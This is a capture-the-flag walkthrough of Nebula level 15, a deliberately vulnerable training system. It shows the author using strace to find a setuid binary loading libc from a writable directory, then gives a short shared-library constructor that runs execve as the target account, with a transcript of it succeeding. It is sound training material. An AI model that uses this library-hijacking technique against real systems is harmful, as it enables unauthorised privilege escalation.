About
strace the binary at /home/flag15/flag15 and see if you spot anything out of the ordinary.
You may wish to review how to "compile a shared library in linux" and how the libraries are loaded and processed by reviewing the dlopen manpage in depth.
Clean up after yourself :)
To do this level, log in as the level15 account with the password level15 . Files for this level can be found in /home/flag15.
This level was PITA. I knew from the very beginning what should I do and how to do it however I’ve had compilation issues (i.e. my initial PoC was valid). Let’s get on with it.
Naturally, first we should follow the clues:
level15@nebula:~$ strace /home/flag15/flag15
(...)
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15", {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 0
(...)
So, the binary tries to use rogue libc.so.6 and as it happens we can write to
the/var/tmp/flag15 directory. Splendid.
To abuse such behaviour we would need to compile our own shared-library and
execute/bin/getflag from within.
Now, I did remember about this (namely
— __libc_start_main()) but I forgot about this(namely
— constructors, desctructors, init(),
and fini()). Kudos to @joernchen for
reminding.
After writing initial PoC I was stuck for couple of days and as it turned out it was because of wrong compilation method. But thanks to that I managed to write more elegant exploit(initial
PoC involved hijacking __libc_start_main() and was ugly). Here it is:
static void __attribute__ ((constructor)) pwn(void);
static void pwn(void) {
execve("/bin/getflag", 0, 0);
}And here’s the funny part: I will not reveal how to compile it but I assure you that this works(as well as very simple hijacking of
__libc_start_main()).
level15@nebula:/var/tmp/flag15$ /home/flag15/flag15
You have successfully executed getflag on a target account